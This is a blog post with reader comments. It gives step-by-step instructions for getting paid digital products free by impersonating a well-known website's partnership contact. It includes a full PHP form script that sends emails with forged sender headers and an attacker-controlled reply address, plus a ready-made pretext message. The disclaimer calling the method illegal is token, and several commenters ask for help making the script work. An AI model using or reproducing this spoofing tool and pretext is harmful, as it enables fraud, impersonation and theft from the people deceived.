How to get free stuff on the Internet via Social Engineering

Everybody loves free stuff. But is it possible to get non-free items free on the internet? Of Course! Through Social Engineering and E-Mail Spoofing you can, and I will show you how with an example to back me up. By reading the rest of this post you are agreeing to our DISCLAIMER. Doing this is Illegal, so don’t do it. It’s just an interesting scenario to read about.

First I will show you the process step-by-step, then I will post my real life example that successfully worked out for me.

1. Find a website selling a digital product(s) online.
2. Find the website’s main E-Mail address, product creators name and write them down.
3. Locate a well-known high-ranking website that is based on the niche of the product.
4. On this website, find their main E-Mail address. Must be a “@that-sites-name.com” E-Mail. If they have multiple go for the one that has to do with advertising or partnerships. Along with the E-Mail address, get the site owner’s name or the name of whoever takes care of advertising and partnerships. Write them down.
5. Create a new E-Mail address (Gmail) with the popular sites owner’s name in it. This will be used as the site owner’s personal E-Mail. Or so they think.
6. Now it’s time to write up a believable E-Mail. In the E-Mail, talk about how your company/website (the popular one you chose) is looking to make partnerships and affiliate with products like theirs (the item you want to receive). Then state that before you would like to continue with the partnership, you would like to get a copy of the product to review it to decide whether you would like to continue with the partnership. If the website you are pretending to be is a large and well known, the product owner will realize that he/she could make a lot of money with you, and will send you a copy of the product without hesitation. (See example below)
7. Now it’s time to send the E-Mail. We will be using the PHP script I wrote below to spoof the E-Mail and make it look like it came from a trusted source (the popular website).
8. I would highly suggest running the script off your own computer using Wamp (Windows) or Mamp (Mac) with an SMTP server. If you don’t know how to do this, sign up for the E-mail list on the right and you can see a video on it. If your ISP doesn’t allow you send your own E-Mails, then upload it to a webserver that supports PHP and the PHP mail() function. If you decide to use a online hosting service, there will be a higher chance that the E-Mail sent will be flagged as spam.
9. Run this script and you should see the following form: http://www.MrCracker.com/form/mail.php Don’t try to use it. It’s disabled.
10. Fill in the spoofed E-Mail. This is the E-Mail of the E-Mail you are spoofing, in other words, the E-Mail that you are impersonating. (The popular site’s E-Mail)
11. Fill in the target’s E-Mail, the product owner’s E-Mail.
12. Fill in the reply E-Mail. This is the E-Mail that you created to be used as the site owner’s E-mail. When the target hits reply, the E-Mail will be sent to this E-mail.
13. Keep the message title short.
14. Now fill in the actual message. Make sure to format the message with HTML otherwise it’ll be sent without line spaces. To add a line break use the HTML command  .
15. Before you send the E-Mail, first send it to your own E-Mail to see how it looks like. Once everything is correct, you can send it off to the actual product owner.
16. Now wait, and hopefully you will get a reply with a download link or attachment.

The E-Mail spoofer PHP script:


<?php
/*

E-Mail Spoofer
MrCracker.com

*/

if($_POST['submit']){ //if submit is hit continue...

$spoof = (stripslashes(trim($_POST['spoof']))); //sanitizes all the user input.
$target = (stripslashes(trim($_POST['target'])));
$reply =  (stripslashes(trim($_POST['reply'])));
$title = str_replace(array("n", "r"), '', stripslashes(trim($_POST['title'])));
$body  = (stripslashes(trim($_POST['body'])));

$headers  = "From: $spoofrn";
$headers .= "Reply-To: $replyrn";
$headers .= 'MIME-Version: 1.0' . "n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "rn";

$regex="/^[a-zA-Z][w .-]+[a-zA-Z0-9]@([a-zA-Z0-9][a-zA-Z0-9-]*.)+[a-zA-Z]{2,4}$/"; //Compares input email to this pattern to make sure it is a valid email.
if($spoof == "" || !preg_match($regex, $spoof)){

echo "<font color='red'><b> Error: No Spoof Email Provided or Email Invalid!
</font></b>"; //error checking
exit;
}
elseif($target == "" || !preg_match($regex, $target)){
echo "<font color='red'><b> Error: No Target Email Provided or Email Invalid!
</font></b>";
exit;
}
elseif($reply == ""){
echo "<font color='red'><b> Error: No Reply Email Provided! </font></b>";
exit;
}
elseif($title == ""){
echo "<font color='red'><b> Error: No Email Title Provided! </font></b>";
exit;
}
elseif($body == ""){
echo "<font color='red'><b> Error: No Email Body Provided! </font></b>";
exit;
}
else{
mail($target, $title, $body, $headers); //if there are no errors, send the email
echo "Mail Was Sent!";
}
}
else{ //if submit wasn't hit, show the HTML form
?>
<!-- This is the CSS which makes the form look the way it does. -->
<html>
<body>
<style type="text/css">
body {
font-family: Arial;
font-size: .9em;
}
input {
background: #ECFDCE;
border: 1px solid green;
}
textarea {
background: #ECFDCE;
border: 1px solid green;
}
legend {
border: 1px solid #048DB4;
background: #F0F8FF;
}

fieldset {
border: 1px solid #048DB4;
width: 18.7em;
padding-left: 11px;
padding-bottom: 20px;
background: #F0F8FF;
}
<!-- This is the HTML form -->
</style>
<fieldset>
<legend>Email Spoofer</legend>
<form action="" method="POST">
Spoofed Email:<br>
<input type="text" size="40" name="spoof"><br>
Targets Email:<br>
<input type="text" size="40" name="target"><br>
Reply Email:<br>
<input type="text" size="40" name="reply"><br>
Message Title:<br>
<input type="text"size="40" name="title"><br>
Message Body:<br>
<textarea rows="10" cols="30" name="body">
</textarea><br>
<input type="submit" value="Submit" name="submit">
<input type="reset" value="Clear">
</form>
</fieldset>
</body>
</html>
<?php
}
?>
</pre>

In the example, I will show you how I used this on someone I know to see if it worked. As you will see, I will not be naming the specific websites or people.

Spoofed Email: advertising@big-sample-site.com

Target Email: Name@product-site.com

Reply To: Site-Big-Owners-Name@Gmail.com

Message Title: Product Name Partnership

Message Body: Hello Product-Owner-Name,

Big-Sample-Site.com is looking to make some new affiliations to raise funding and your “Product Name” has caught our attention. We only consider serious and professional products. Before we consider anything else, would you be willing to send us a copy of your product so that we may review it and decide whether we would still like to pursue this partnership.

If you are interested, please reply to this E-Mail as soon as possible.

-Name

Big-Sample-Website.com

Notice how I added into the message. This is important so that line breaks are created. If they aren’t added, the whole message will be received in one giant paragraph and won’t look professional.

The next day, I had the product in my E-Mail, and I notified my friend about this kind of attack.

Note: This is a shot or miss thing. Some people will get suspicious and send the actual product to the original E-Mail isntead of the changed reply E-Mail address. Sometimes people will fall for regular free E-Mail address. If you use a free E-Mail address, you won’t have to spoof the E-Mail and risk have it sent to spam, or having the target reply to the wrong E-Mail, so that’s also worth a try.”"

24 Comments

Leave a Comment

dark358
June 8, 2009 at 7:37 am Reply

hi, will this work i wrote my self a php script like this but its getting errorsa in its creation.if u r willing i can send u the code and may be u can help me.mail me if u want the code..thanx.
- David
  June 8, 2009 at 6:17 pm Reply
  
  sure dark, email me your errors and I’ll try to help you out.
Pingback: BloggersBase Internet
AJs Free Stuff
February 7, 2010 at 9:50 pm Reply

This is interesting but there are legal ways to get stuff for free.
F.L.Groves
March 10, 2010 at 6:00 am Reply

Surely it took more than this one email correspondence to get the free product, right? Where did you have them send the actual product? Did you use a PO Box or an actual address? I understand the process up to the point where you took possession of the merchandise.
- David
  March 12, 2010 at 7:23 pm Reply
  
  Did it for digital items. A lot easier.
David
March 12, 2010 at 7:49 pm Reply

Oh yah, it did take more than one email. That’s what the changed return address is for.
Samantha Thomas
April 30, 2010 at 6:00 pm Reply

i enjoy Podcasting on my desktop PC. it really helps me share my ideas and thoughts over the internet“;
Eric @ registry clean up site
May 4, 2010 at 3:44 am Reply

Good! Registry Cleaners are great because they will scans your Windows registry for invalid or obsolete information and provide a list of the errors found.
sami
May 12, 2010 at 11:13 am Reply

can i send emails to more thene one target,in the target email box can i put a lote of emails ?
thanx
- David
  May 17, 2010 at 11:35 am Reply
  
  I didn’t make it to do multiple emails. I could do an update in the future that supports it.
mcworld
May 16, 2010 at 10:04 pm Reply

yah, i found a lot of articles on google showing that this is pretty illegal, so i wouldn’t try it…
Satyajit
July 2, 2010 at 9:36 am Reply

this is really interesting……thanks David
Brooke Young
July 9, 2010 at 6:43 am Reply

i am always looking for some free stuffs over the internet. there are also some companies which gives free samples..-’
Rupul
October 17, 2010 at 3:48 pm Reply

not working
- David
  October 17, 2010 at 4:40 pm Reply
  
  What part isn’t working?
Rupul
October 20, 2010 at 2:10 pm Reply

mail is not going
King
November 27, 2010 at 6:07 pm Reply

Email is spoofed but your IP is still going to be there in the email that will be received. This is kid stuff and you will get caught – You should be spoofing the IP as well.
daniyal
December 8, 2010 at 9:45 am Reply

Nice post.My friend told me about a software that gets free stuff from the net and he used it to get many things.If you know about this software please tell me.
YYOOYO
January 28, 2011 at 3:13 pm Reply

Dear author, Do u know hacks of facebook games such as yoville, farmville.
plzz help me!
Mukul
April 21, 2011 at 5:56 am Reply

Heyyyy David I would like to ask if u could have given an example with this that would be helpfulll….
DarkLanX
July 27, 2011 at 12:23 pm Reply

I don’t know how can I use that PHP script,I’m not good at php….
dex-hex
August 27, 2011 at 5:17 pm Reply

hey i kno that this is irrelevant to the topic but i heard that anonymous are going to dos facebook, now from all i’ve heard about anonymous they dont actually have a leader or even a fixed ideal and i know they were blamed for the PSN crash but personally i think someone was just scapegoating them for that seeing as how noone knows whos involved with them but could someone post a website name (dont post a link considering the nature of the website i dont trust them) about them and there movements if one even exists, for once google isn’t being very friendly :L
Theodore Hinz
April 16, 2012 at 9:00 pm Reply

I really like and appreciate your blog article.Much thanks again. Cool.

CrackerCast Episode 15 - Social Engineering

Hacking into a Bank

CrackerCast Episode 19 - Facebook Hacking

CrackerCast Episode 20 - Reconnaissance